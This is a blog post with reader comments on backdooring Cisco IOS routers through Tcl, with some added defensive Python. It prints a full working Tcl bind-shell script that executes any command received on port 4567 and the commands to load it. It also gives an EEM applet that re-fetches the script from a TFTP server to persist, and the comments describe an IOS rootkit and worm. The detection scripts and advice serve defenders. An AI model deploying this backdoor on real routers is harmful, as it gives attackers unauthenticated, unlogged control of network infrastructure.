Attacking Cisco Router over TCL
Today only a lazy person, or someone outside the IT sphere, has never heard of Cisco, a company specializing in developing network devices and solving related problems. IOS (Internetwork Operating System) is installed on Cisco networking equipment and allows flexible system configuration. There are different methods for attacking Cisco devices, but what we will be looking at here is attacking Cisco devices using Tcl.
Tcl (Tool Command Language) is a scripting language used on embedded systems platforms, both in its full form and in several small-footprint versions. Since Cisco IOS version 12.3 (7/28/2003), Tcl has been included in Cisco IOS as a generic scripting language.
When you first log in to a Cisco router you are in user EXEC mode (privilege level 1); from this mode you can only view some information, such as interface status and the routes in the routing table. To execute a Tcl script we need privilege level 15 (full admin) rights; this level is equivalent to having root privileges on UNIX or administrator privileges on Windows.
For uploading the Tcl script to the Cisco device we can use different protocols such as TFTP, RCP or SCP. For TFTP you do the following:
Router>en
Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl
The Tcl script was originally published by Andy Davis from Information Risk Management; after some modification it looks as follows:
proc callback {sock addr port} {
    # Line-buffered, LF-terminated channel for the interactive session
    fconfigure $sock -translation lf -buffering line
    puts $sock " Enter your desired IOS command:"
    puts $sock " "
    puts -nonewline $sock "Router# "
    # Run echo whenever the client sends data on this socket
    fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
    global var
    if {[eof $sock] || [catch {gets $sock line}]} {
        # Client disconnected: drop the channel so the readable event stops firing
        close $sock
    } else {
        # Execute the received line as an IOS command and send its output back
        set response [exec "$line"]
        puts $sock $response
    }
}
set port 4567
# Listen on the port; callback runs for every accepted connection
set sh [socket -server callback $port]
# var is never set, so the event loop runs until the script is stopped
vwait var
close $sh
This gives us a backdoor on the router: if an attacker telnets to port 4567 he will see the following:
$ telnet router 4567
Trying router...
Connected to router.
Escape character is '^]'.
Enter your desired IOS command:
Router#
This vulnerability has been fixed in recent IOS versions, but you can still use the same technique if you convert the Tcl script into an EEM policy and trigger it periodically with a timer event as follows:
Router>en
Router# conf t
Router(config)# event manager applet Tclsh
Router(config-applet)# event timer countdown name Delay time 20
Router(config-applet)# action 1 cli command "enable"
Router(config-applet)# action 2 cli command "tclsh tftp://tftpserver/script.tcl"
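Because the EEM variant persists in the running configuration, the most direct way for a defender to catch it is to audit every `event manager applet` block for actions that invoke tclsh or fetch a script from a remote server. The following Python is an added example, not code from the original post; it parses a constructed running-config excerpt (the applet names, actions and hostnames are assumed sample values) and reports the offending applet and line.

```python
import re

# Constructed sample running-config excerpt (not captured from a real device);
# the "Tclsh" applet mirrors the EEM persistence shown in the post.
SAMPLE_RUNNING_CONFIG = """\
!
hostname Router
!
event manager applet Tclsh
 event timer countdown name Delay time 20
 action 1 cli command "enable"
 action 2 cli command "tclsh tftp://tftpserver/script.tcl"
!
event manager applet IntfDown
 event syslog pattern "LINEPROTO-5-UPDOWN.*down"
 action 1 syslog msg "interface went down"
!
line vty 0 4
 transport input ssh
!
"""

APPLET_RE = re.compile(r"^event manager applet (\S+)")
# Actions that run the Tcl shell or pull content over a file-transfer protocol
SUSPICIOUS_ACTION = re.compile(r"\b(tclsh|tftp://|rcp://|scp://|ftp://|https?://)", re.IGNORECASE)


def parse_applets(config_text):
    """Return {applet_name: [sub-command lines]} for every EEM applet in a running-config."""
    applets = {}
    current = None
    for raw in config_text.splitlines():
        m = APPLET_RE.match(raw)
        if m:
            current = m.group(1)
            applets[current] = []
            continue
        if current is not None and raw.startswith(" "):
            applets[current].append(raw.strip())   # indented line belongs to the applet
        else:
            current = None   # '!' or any other top-level line ends the applet block
    return applets


def find_suspicious_applets(config_text):
    """Return [(applet_name, action_line)] for applets running tclsh or fetching remote files."""
    findings = []
    for name, lines in parse_applets(config_text).items():
        for line in lines:
            if line.startswith("action") and SUSPICIOUS_ACTION.search(line):
                findings.append((name, line))
    return findings


if __name__ == "__main__":
    for name, line in find_suspicious_applets(SAMPLE_RUNNING_CONFIG):
        print(f"applet {name!r}: {line}")
```

Feed it the output of `show running-config` saved to a file; applets that only raise syslog messages (like the IntfDown applet above) pass, while any applet that chains into tclsh or a remote file is listed for review.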
By executing the backdoor a penetration tester can access the targeted host, bypassing security measures such as authentication and access logging. To detect whether your router is compromised you need to run:
Router# show tcp brief all
This is equivalent to netstat on a Windows or Linux system: it lists all connections that are established or waiting to be established on the router. So, for the security of your business, make sure you run the latest IOS version, keep all your systems updated, and follow best practices when implementing or configuring any device.
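Reading `show tcp brief all` by eye works on one router but not across a fleet, so the following Python parses that output and flags any socket in LISTEN state on a port that is not in an expected allowlist (the backdoor above would show up as `*.4567`). It is an added example, not code from the original post; the sample output is constructed to match the column layout of the command, and the allowlist of expected listening ports (22, 23, 179) is an assumption you would replace with your own baseline.

```python
import re

# Constructed sample output of "show tcp brief all" (not captured from a real device);
# the *.4567 listener corresponds to the Tcl backdoor described in the post.
SAMPLE_SHOW_TCP = """\
TCB       Local Address           Foreign Address        (state)
6523A4FC  10.1.25.3.11000         10.1.25.3.23           ESTAB
653FCBBC  *.22                    *.*                    LISTEN
653FD0F0  *.23                    *.*                    LISTEN
653FE2A8  *.4567                  *.*                    LISTEN
653FF1C0  *.179                   *.*                    LISTEN
"""

# Assumed baseline: SSH, Telnet and BGP are the only services expected to listen
EXPECTED_LISTENERS = {22, 23, 179}

# TCB handle (hex), local endpoint, foreign endpoint, state
ROW_RE = re.compile(r"^(?P<tcb>[0-9A-F]+)\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s+(?P<state>\S+)$")


def split_endpoint(endpoint):
    """'10.1.25.3.23' -> ('10.1.25.3', 23); '*.4567' -> ('*', 4567); '*.*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(".")
    return host, (int(port) if port.isdigit() else None)


def parse_show_tcp_brief(output):
    """Turn the command output into a list of socket dicts, skipping the header line."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue   # header ("TCB ...") or blank line
        d = m.groupdict()
        lhost, lport = split_endpoint(d["local"])
        fhost, fport = split_endpoint(d["foreign"])
        rows.append({
            "tcb": d["tcb"],
            "local_host": lhost, "local_port": lport,
            "foreign_host": fhost, "foreign_port": fport,
            "state": d["state"],
        })
    return rows


def unexpected_listeners(output, expected=EXPECTED_LISTENERS):
    """Return the sorted list of listening ports that are not in the expected baseline."""
    return sorted(
        r["local_port"]
        for r in parse_show_tcp_brief(output)
        if r["state"] == "LISTEN" and r["local_port"] not in expected
    )


if __name__ == "__main__":
    for port in unexpected_listeners(SAMPLE_SHOW_TCP):
        print(f"unexpected listener on TCP port {port}")
```

Run it against the saved output of the command from each device; an empty result means every listener matches the baseline, and any port it prints deserves a look at who started it and what the running-config contains.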
Warning: The technique demonstrated is intended just for the use during an authorized penetration testing mission.
References:
Cisco IOS Scripting with Tcl
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html
SANS Institute, IOScat - a Port of Netcat's TCP functions to Cisco IOS
http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964
Yeah, I demoed this at Black Hat 2010:
http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss
It was an IOS rootkit and a self-propagating IOS worm. The rootkit had a forward/reverse shell, a traffic pcap dumper, a malware httpd server and other stuff. It was all done in tclsh.
Thanks for the comment, Jason. Can I have more details about the lab?
Here is the PDF, with lots of examples of the rootkit and accessories. The worm is not public though.
http://www.surf.vi/docs/san_fran.pdf
Thanks for sharing, Jason, a very interesting demonstration.
This is one of the best posts that I've ever seen; you may include some more ideas on the same theme. I'm still waiting for some interesting thoughts from your side in your next post.
The first version of this attack (using tclsh) was fixed in IOS 12.4(15)T; the second (using an EEM policy) in IOS 12.4(20)T1.
Awesome.
[…] Today, while browsing foreign sites, I found an article on a method of leaving a backdoor when attacking Cisco routers. Although I haven't touched Cisco for over a year and don't use it at work, I still love Cisco, heh! Getting to the point: it is an English-language article and not hard to read. The gist is that once you have privileges on a Cisco router you can upload a backdoor program written in the Tcl scripting language to the device, after which you can remotely telnet into the router without router admin rights. Very powerful! Cisco advanced players at CCIE Security level are probably familiar with the Tcl scripting language; when I studied for CCNP the course barely mentioned Tcl scripts. On Cisco it is a very powerful thing that can help engineers finish many tedious jobs, for example pinging a whole IP address range in batch from the device. […]
Hmm,
here I have a question:
How do I configure Tcl on Cisco IOS if it has not been configured? IOS version > 12.4(20)T